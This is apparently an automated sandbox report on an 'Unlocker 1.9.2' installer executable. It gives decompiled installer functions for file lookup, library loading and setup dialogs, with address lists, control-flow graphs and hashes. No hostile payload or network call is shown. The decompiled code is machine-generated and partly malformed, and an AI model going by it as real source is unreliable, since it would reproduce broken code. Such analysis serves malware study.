                                                                                                                                                              0x0040641a
                                                                                                                                                              0x0040641c
                                                                                                                                                              0x0040641e
                                                                                                                                                              0x00406421
                                                                                                                                                              0x00406424
                                                                                                                                                              0x0040643a
                                                                                                                                                              0x0040643f
                                                                                                                                                              0x00406477
                                                                                                                                                              0x00406477
                                                                                                                                                              0x0040647b
                                                                                                                                                              0x004064a7
                                                                                                                                                              0x004064a9
                                                                                                                                                              0x004064b0
                                                                                                                                                              0x004064b3
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bd
                                                                                                                                                              0x004064c0
                                                                                                                                                              0x004064c7
                                                                                                                                                              0x004064ca
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064fa
                                                                                                                                                              0x004064fd
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406571
                                                                                                                                                              0x004064ff
                                                                                                                                                              0x00406505
                                                                                                                                                              0x00406508
                                                                                                                                                              0x0040650b
                                                                                                                                                              0x0040650e
                                                                                                                                                              0x00406511
                                                                                                                                                              0x00406514
                                                                                                                                                              0x00406517
                                                                                                                                                              0x0040651a
                                                                                                                                                              0x0040651d
                                                                                                                                                              0x00406520
                                                                                                                                                              0x00406539
                                                                                                                                                              0x0040653b
                                                                                                                                                              0x0040653e
                                                                                                                                                              0x0040653f
                                                                                                                                                              0x00406542
                                                                                                                                                              0x00406544
                                                                                                                                                              0x00406547
                                                                                                                                                              0x00406549
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x0040654e
                                                                                                                                                              0x00406550
                                                                                                                                                              0x00406553
                                                                                                                                                              0x00406557
                                                                                                                                                              0x00406559
                                                                                                                                                              0x00406559
                                                                                                                                                              0x0040655a
                                                                                                                                                              0x0040655d
                                                                                                                                                              0x00406560
                                                                                                                                                              0x00406522
                                                                                                                                                              0x00406522
                                                                                                                                                              0x0040652a
                                                                                                                                                              0x0040652f
                                                                                                                                                              0x00406531
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406563
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x0040647d
                                                                                                                                                              0x00406480
                                                                                                                                                              0x00406482
                                                                                                                                                              0x00406485
                                                                                                                                                              0x00406488
                                                                                                                                                              0x0040648b
                                                                                                                                                              0x0040648d
                                                                                                                                                              0x00406490
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406499
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406426
                                                                                                                                                              0x00406429
                                                                                                                                                              0x0040642b
                                                                                                                                                              0x0040642e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406318
                                                                                                                                                              0x00406318
                                                                                                                                                              0x0040631c
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00406322
                                                                                                                                                              0x00406325
                                                                                                                                                              0x00406328
                                                                                                                                                              0x0040632b
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x00406330
                                                                                                                                                              0x00406333
                                                                                                                                                              0x00406336
                                                                                                                                                              0x00406339
                                                                                                                                                              0x0040633c
                                                                                                                                                              0x0040633f
                                                                                                                                                              0x00406340
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                                                                                                                                              • Instruction ID: ffbedf2a53f09e030cb941e21afd419a8c3069ec791793070072d3341ca218b9
                                                                                                                                                              • Opcode Fuzzy Hash: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                                                                                                                                              • Instruction Fuzzy Hash: 17F16571D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A86CF44
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405CD8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405CD8(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224c8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224c8;
			}




                                                                                                                                                              0x00405ce3
                                                                                                                                                              0x00405cec
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405cf9
                                                                                                                                                              0x00405cef
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,004224C8,C:\,004055F4,C:\,C:\,00000000,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405CE3
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405CEF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                              • String ID: C:\
                                                                                                                                                              • API String ID: 2295610775-3404278061
                                                                                                                                                              • Opcode ID: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                                                                                              • Instruction ID: 9a18407f5d3c0b203e51d924b64f4f6f4a008a27543408caa796c3d3b713bef8
                                                                                                                                                              • Opcode Fuzzy Hash: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                                                                                              • Instruction Fuzzy Hash: 91D0C93594D620ABD6012728AD0884B6A589B153317508B32F46AE22E0C7748C529AA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405CFF Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405CFF(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409200);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409204));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                                                                                              0x00405d07
                                                                                                                                                              0x00405d0a
                                                                                                                                                              0x00405d11
                                                                                                                                                              0x00405d19
                                                                                                                                                              0x00405d26
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405d2d
                                                                                                                                                              0x00405d1c
                                                                                                                                                              0x00405d24
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405d35

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 310444273-0
                                                                                                                                                              • Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                                                                                                                                              • Instruction ID: d69b72dbe4010a9b48e4a262f362438d38f190b8a9031efe6831075815a54aa0
                                                                                                                                                              • Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                                                                                                                                              • Instruction Fuzzy Hash: 5DE08C32A04610BBD3215B20AE0896B73A8EED9B403004C7EF615F6251D734AC11DBBA
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004038BC Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 278 4038bc-4038ce 279 4038d4-4038da 278->279 280 403a0f-403a1e 278->280 279->280 281 4038e0-4038e9 279->281 282 403a20-403a5b GetDlgItem * 2 call 403d8f KiUserCallbackDispatcher call 40140b 280->282 283 403a6d-403a82 280->283 284 4038eb-4038f8 SetWindowPos 281->284 285 4038fe-403901 281->285 305 403a60-403a68 282->305 287 403ac2-403ac7 call 403ddb 283->287 288 403a84-403a87 283->288 284->285 289 403903-403915 ShowWindow 285->289 290 40391b-403921 285->290 295 403acc-403ae7 287->295 292 403a89-403a94 call 401389 288->292 293 403aba-403abc 288->293 289->290 296 403923-403938 DestroyWindow 290->296 297 40393d-403940 290->297 292->293 315 403a96-403ab5 SendMessageA 292->315 293->287 300 403d5c 293->300 301 403af0-403af6 295->301 302 403ae9-403aeb call 40140b 295->302 304 403d39-403d3f 296->304 306 403942-40394e SetWindowLongA 297->306 307 403953-403959 297->307 303 403d5e-403d65 300->303 311 403d1a-403d33 DestroyWindow KiUserCallbackDispatcher 301->311 312 403afc-403b07 301->312 302->301 304->300 309 403d41-403d47 304->309 305->283 306->303 313 4039fc-403a0a call 403df6 307->313 314 40395f-403970 GetDlgItem 307->314 309->300 316 403d49-403d52 ShowWindow 309->316 311->304 312->311 317 403b0d-403b5a call 4059ff call 403d8f * 3 GetDlgItem 312->317 313->303 318 403972-403989 SendMessageA IsWindowEnabled 314->318 319 40398f-403992 314->319 315->303 316->300 348 403b64-403ba0 ShowWindow KiUserCallbackDispatcher call 403db1 KiUserCallbackDispatcher 317->348 349 403b5c-403b61 317->349 318->300 318->319 323 403994-403995 319->323 324 403997-40399a 319->324 326 4039c5-4039ca call 403d68 323->326 327 4039a8-4039ad 324->327 328 40399c-4039a2 324->328 326->313 329 4039e3-4039f6 SendMessageA 327->329 330 4039af-4039b5 327->330 328->329 333 4039a4-4039a6 328->333 329->313 334 4039b7-4039bd call 40140b 330->334 335 4039cc-4039d5 call 40140b 330->335 333->326 344 4039c3 334->344 335->313 345 4039d7-4039e1 335->345 344->326 345->344 352 403ba2-403ba3 348->352 353 403ba5 348->353 349->348 354 403ba7-403bd5 GetSystemMenu EnableMenuItem SendMessageA 352->354 353->354 355 403bd7-403be8 SendMessageA 354->355 356 403bea 354->356 357 403bf0-403c29 call 403dc4 call 4059dd lstrlenA call 4059ff SetWindowTextA call 401389 355->357 356->357 357->295 366 403c2f-403c31 357->366 366->295 367 403c37-403c3b 366->367 368 403c5a-403c6e KiUserCallbackDispatcher 367->368 369 403c3d-403c43 367->369 368->304 371 403c74-403ca1 CreateDialogParamA 368->371 369->300 370 403c49-403c4f 369->370 370->295 372 403c55 370->372 371->304 373 403ca7-403cfe call 403d8f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 371->373 372->300 373->300 378 403d00-403d13 ShowWindow call 403ddb 373->378 380 403d18 378->380 380->304
                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E004038BC(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42045c = _t35;
					if(_t115 == 0x110) {
						 *0x423e88 = _t125;
						 *0x420470 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f438 = _t91;
						E00403D8F(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423668); // executed
						 *0x42364c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42045c = 1;
					}
					_t122 =  *0x4091a4; // 0x8
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ea0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403DDB(0x40b);
						while(1) {
							_t37 =  *0x42045c;
							 *0x4091a4 =  *0x4091a4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091a4; // 0x8
							__eflags = _t39 -  *0x423ea4; // 0x8
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42364c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423ea4; // 0x8
							__eflags =  *0x4091a4 - _t44; // 0x8
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E004059FF(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403D8F(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403D8F(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403D8F(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f0c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008); // executed
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
							E00403DB1(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f438, _t117); // executed
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f0c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420470);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f438);
							}
							E00403DC4();
							E004059DD(0x420478, "Unlocker 1.9.2 Setup");
							E004059FF(0x420478, _t125, _t130,  &(0x420478[lstrlenA(0x420478)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420478); // executed
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423658); // executed
									 *0x41fc48 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423e80,  *_t130 +  *0x423660 & 0x0000ffff, _t125,  *(0x4091a8 +  *(_t130 + 4) * 4), _t130); // executed
									__eflags = _t73 - _t133;
									 *0x423658 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403D8F(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423658, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42364c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423658, 8); // executed
									E00403DDB(0x405);
									goto L58;
								}
								__eflags =  *0x423f0c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423f00 - _t133; // 0x20
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423658); // executed
						 *0x423e88 = _t133;
						EndDialog(_t125,  *0x41f840);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423658, 0x40f, 0, 1);
						__eflags =  *0x42364c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420450, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420450,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403DF6(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423658, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f0c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f840 = 1;
											L21:
											_push(0x78);
											L22:
											E00403D68();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f840 = _t127;
										goto L21;
									}
									__eflags =  *0x4091a4 - _t133; // 0x8
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423658); // executed
						 *0x423658 = _a12;
						L58:
						_t141 =  *0x421478 - _t133; // 0x1
						if(_t141 == 0) {
							_t142 =  *0x423658 - _t133; // 0x14005a
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa); // executed
								 *0x421478 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

































                                                                                                                                                              0x004038c5
                                                                                                                                                              0x004038ce
                                                                                                                                                              0x00403a0f
                                                                                                                                                              0x00403a13
                                                                                                                                                              0x00403a17
                                                                                                                                                              0x00403a19
                                                                                                                                                              0x00403a1e
                                                                                                                                                              0x00403a29
                                                                                                                                                              0x00403a34
                                                                                                                                                              0x00403a39
                                                                                                                                                              0x00403a3b
                                                                                                                                                              0x00403a3d
                                                                                                                                                              0x00403a40
                                                                                                                                                              0x00403a45
                                                                                                                                                              0x00403a53
                                                                                                                                                              0x00403a60
                                                                                                                                                              0x00403a67
                                                                                                                                                              0x00403a67
                                                                                                                                                              0x00403a68
                                                                                                                                                              0x00403a68
                                                                                                                                                              0x00403a6d
                                                                                                                                                              0x00403a73
                                                                                                                                                              0x00403a7a
                                                                                                                                                              0x00403a80
                                                                                                                                                              0x00403a82
                                                                                                                                                              0x00403ac2
                                                                                                                                                              0x00403ac7
                                                                                                                                                              0x00403acc
                                                                                                                                                              0x00403acc
                                                                                                                                                              0x00403ad1
                                                                                                                                                              0x00403ada
                                                                                                                                                              0x00403adc
                                                                                                                                                              0x00403ae1
                                                                                                                                                              0x00403ae7
                                                                                                                                                              0x00403aeb
                                                                                                                                                              0x00403aeb
                                                                                                                                                              0x00403af0
                                                                                                                                                              0x00403af6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403afc
                                                                                                                                                              0x00403b01
                                                                                                                                                              0x00403b07
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403b10
                                                                                                                                                              0x00403b18
                                                                                                                                                              0x00403b1d
                                                                                                                                                              0x00403b20
                                                                                                                                                              0x00403b26
                                                                                                                                                              0x00403b2b
                                                                                                                                                              0x00403b2e
                                                                                                                                                              0x00403b34
                                                                                                                                                              0x00403b39
                                                                                                                                                              0x00403b3c
                                                                                                                                                              0x00403b42
                                                                                                                                                              0x00403b4a
                                                                                                                                                              0x00403b50
                                                                                                                                                              0x00403b56
                                                                                                                                                              0x00403b5a
                                                                                                                                                              0x00403b61
                                                                                                                                                              0x00403b61
                                                                                                                                                              0x00403b61
                                                                                                                                                              0x00403b6b
                                                                                                                                                              0x00403b7d
                                                                                                                                                              0x00403b89
                                                                                                                                                              0x00403b8e
                                                                                                                                                              0x00403b98
                                                                                                                                                              0x00403b9e
                                                                                                                                                              0x00403ba0
                                                                                                                                                              0x00403ba5
                                                                                                                                                              0x00403ba2
                                                                                                                                                              0x00403ba2
                                                                                                                                                              0x00403ba2
                                                                                                                                                              0x00403bb5
                                                                                                                                                              0x00403bcd
                                                                                                                                                              0x00403bcf
                                                                                                                                                              0x00403bd5
                                                                                                                                                              0x00403bea
                                                                                                                                                              0x00403bd7
                                                                                                                                                              0x00403be0
                                                                                                                                                              0x00403be2
                                                                                                                                                              0x00403be2
                                                                                                                                                              0x00403bf0
                                                                                                                                                              0x00403c00
                                                                                                                                                              0x00403c11
                                                                                                                                                              0x00403c18
                                                                                                                                                              0x00403c1e
                                                                                                                                                              0x00403c22
                                                                                                                                                              0x00403c27
                                                                                                                                                              0x00403c29
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c2f
                                                                                                                                                              0x00403c2f
                                                                                                                                                              0x00403c31
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c37
                                                                                                                                                              0x00403c3b
                                                                                                                                                              0x00403c60
                                                                                                                                                              0x00403c66
                                                                                                                                                              0x00403c6c
                                                                                                                                                              0x00403c6e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c94
                                                                                                                                                              0x00403c9a
                                                                                                                                                              0x00403c9c
                                                                                                                                                              0x00403ca1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403ca7
                                                                                                                                                              0x00403caa
                                                                                                                                                              0x00403cad
                                                                                                                                                              0x00403cc4
                                                                                                                                                              0x00403cd0
                                                                                                                                                              0x00403ce9
                                                                                                                                                              0x00403cef
                                                                                                                                                              0x00403cf3
                                                                                                                                                              0x00403cf8
                                                                                                                                                              0x00403cfe
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403d08
                                                                                                                                                              0x00403d13
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403d13
                                                                                                                                                              0x00403c3d
                                                                                                                                                              0x00403c43
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c49
                                                                                                                                                              0x00403c4f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c55
                                                                                                                                                              0x00403c29
